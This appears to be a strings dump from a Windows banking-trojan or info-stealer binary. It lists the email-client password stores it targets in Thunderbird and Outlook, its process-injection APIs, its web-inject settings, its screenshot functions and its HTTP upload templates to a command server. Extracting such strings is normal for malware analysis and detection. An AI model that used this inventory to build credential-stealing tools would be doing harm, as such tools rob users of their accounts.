- LdrGetProcedureAddress
- RtlNtStatusToDosError
- RtlSetLastWin32Error
- NtQueryVirtualMemory
- NtAllocateVirtualMemory
- NtFreeVirtualMemory
- NtProtectVirtualMemory
- NtReadVirtualMemory
- NtWriteVirtualMemory
- NtGetContextThread
- NtSetContextThread
- true
- false
- null
- null
- true
- false
- \r\n\r\n
- HTTP/1.
- Transfer-Encoding
- chunked
- Content-Length
- Connection
- close
- Proxy-Connection
- close
- HTTP/1.
- Host
- Content-Length
- https://
- Referer
- Content-Type
- Authorization
- %x\r\n
- \r\n0\r\n\r\n
- Content-Length
- identity
- Accept-Encoding
- If-Modified-Since
- --->
- <!---
- --->
- <!---
- Software\\c2hpdHmjcmF6eUBleHBsb2l0Lmlt\\
- Software\\c2hpdHmjcmF6eUBleHBsb2l0Lmlt\\Dns\\
- Software\\c2hpdHmjcmF6eUBleHBsb2l0Lmlt\\Dns\\
- Resource: (%S), Service: (%S), User: (%S), Password: (%S)
- EMAIL
- Resource: (%s), Service: (%s), User: (%s), Password: (%s)
- PK11SDR_Decrypt
- SECITEM_ZfreeItem
- %s\\Thunderbird\\profiles.ini
- Path
- Profile0
- %s\\Thunderbird\\%s\\logins.json
- NSS_Init
- \"hostname\":\"
- \"encryptedUsername\":\"
- \"encryptedPassword\":\"
- NULL
- HTTPMail User Name
- HTTPMail Server
- HTTPMail Password2
- POP3 User Name
- POP3 Server
- POP3 Password2
- IMAP User Name
- IMAP Server
- IMAP Password2
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- HTTP User
- HTTP Server URL
- HTTP Password
- POP3 User
- POP3 Server
- POP3 Password
- IMAP User
- IMAP Server
- IMAP Password
- pstorec.dll
- PStoreCreateInstance
- 220d5cd0
- 220d5cc1
- crypt32.dll
- CryptUnprotectData
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- HTTP User
- Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
- HTTP Server URL
- HTTP Password
- POP3 User
- POP3 Server
- POP3 Password
- IMAP User
- IMAP Server
- IMAP Password
- crypt32.dll
- CryptUnprotectData
- Software\\Microsoft\\Internet Account Manager\\Accounts
- Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts
- Transfer-Encoding
- user_pref(\"network.http.spdy.enabled\", false);\r\nuser_pref(\"network.http.spdy.enabled.http2\", false);\r\n
- \r\n\r\n
- HTTP/1.
- chunked
- Content-Length
- Connection
- close
- Proxy-Connection
- close
- HTTP/1.
- Host
- Content-Length
- https://
- Referer
- Content-Type
- Authorization
- %x\r\n
- \r\n0\r\n\r\n
- Content-Length
- identity
- Accept-Encoding
- If-Modified-Since
- PR_GetNameForIdentity
- PR_SetError
- PR_GetError
- PR_OpenTCPSocket
- PR_Close
- application/x-www-form-urlencoded
- NONE
- script
- script
- nbsp;
- <!DOCTYPE
- InternetCloseHandle gle: 0x%X, %u
- InternetCloseHandle
- InternetQueryDataAvailable
- HttpOpenRequestW
- InternetConnectW
- HttpSendRequestW
- InternetReadFile
- InternetWriteFile
- LdrLoadDll
- LdrGetProcedureAddress
- RtlInitAnsiString
- RtlCreateUnicodeStringFromAsciiz
- RtlCreateUserThread
- LdrLoadDll
- LdrGetProcedureAddress
- RtlInitAnsiString
- RtlCreateUnicodeStringFromAsciiz
- RtlCreateUserThread
- IsWow64Process
- %[^:]:%d
- RtlCompressBuffer
- RtlGetCompressionWorkSpaceSize
- RtlDecompressBuffer
- GdipCreateBitmapFromHBITMAP
- GdipSaveImageToFile
- Software\\c2hpdHmjcmF6eUBleHBsb2l0Lmlt\\
- injects
- set_host
- set_path
- inject_setting
- data_keyword
- inject_before_keyword
- inject_after_keyword
- _wv=%ls
- _wv=%ls
- bc00595440e801f8a5d2a2ad13b9791b
- auth
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
- POST %s HTTP/1.0\r\nHost: %s\r\n%s\r\nCookie: %s=%s\r\nContent-type: application/x-www-form-urlencoded\r\nContent-length: %i\r\n\r\n%s\n
- bc00595440e801f8a5d2a2ad13b9791b
- auth
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
- POST %s HTTP/1.0\r\nHost: %s\r\n%s\r\nCookie: %s=%s\r\nContent-type: application/x-www-form-urlencoded\r\nContent-length: %i\r\n\r\n%s\n
- \r\n-----------------------------%d\r\n
- \r\n-----------------------------%d\r\n
- -----------------------------%d\r\nContent-Disposition: form-data;name=\"fname\"\r\n\r\n%ls\r\n-----------------------------%d\r\nContent-Disposition: form-data; name=\"data\"; filename=\"%ls\"\r\nContent-Type: application/octet-stream\r\n\r\n
- -----------------------------%d\r\nContent-Disposition: form-data;name=\"fname\"\r\n\r\n%ls\r\n-----------------------------%d\r\nContent-Disposition: form-data; name=\"data\"; filename=\"%ls\"\r\nContent-Type: application/octet-stream\r\n\r\n
- bc00595440e801f8a5d2a2ad13b9791b
- auth
- POST %s HTTP/1.0\r\nHost: %s\r\nCookie: %s=%s;uid=%ls\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0\r\nContent-Type: multipart/form-data; boundary=---------------------------%d\r\nContent-Length: %d\r\nConnection: close\r\n\r\n
- bc00595440e801f8a5d2a2ad13b9791b
- auth
- POST %s HTTP/1.0\r\nHost: %s\r\nCookie: %s=%s;uid=%ls\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0\r\nContent-Type: multipart/form-data; boundary=---------------------------%d\r\nContent-Length: %d\r\nConnection: close\r\n\r\n
- GET %s HTTP/1.0\r\nHost: %s\r\nAccept: */* \r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\nConnection: Close\r\n\r\n\r\n
- GET %s HTTP/1.0\r\nHost: %s\r\nAccept: */* \r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\nConnection: Close\r\n\r\n\r\n
- --->
- <!---
- %02X
- https://
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
- HTTP/1.1
- POST
- Connection: close\r\n
- urlmon.dll
- ObtainUserAgentString
- InitSecurityInterfaceA
- Microsoft Unified Security Protocol Provider
- gdiplus.dll
- CRYPT32.dll
- WININET.dll
- SHLWAPI.dll
- PSAPI.DLL
- WS2_32.dll
- DNSAPI.dll
- KERNEL32.dll
- USER32.dll
- GDI32.dll
- ADVAPI32.dll
- SHELL32.dll
- ole32.dll
- MSVCRT.dll
- PR_Read
- PR_Write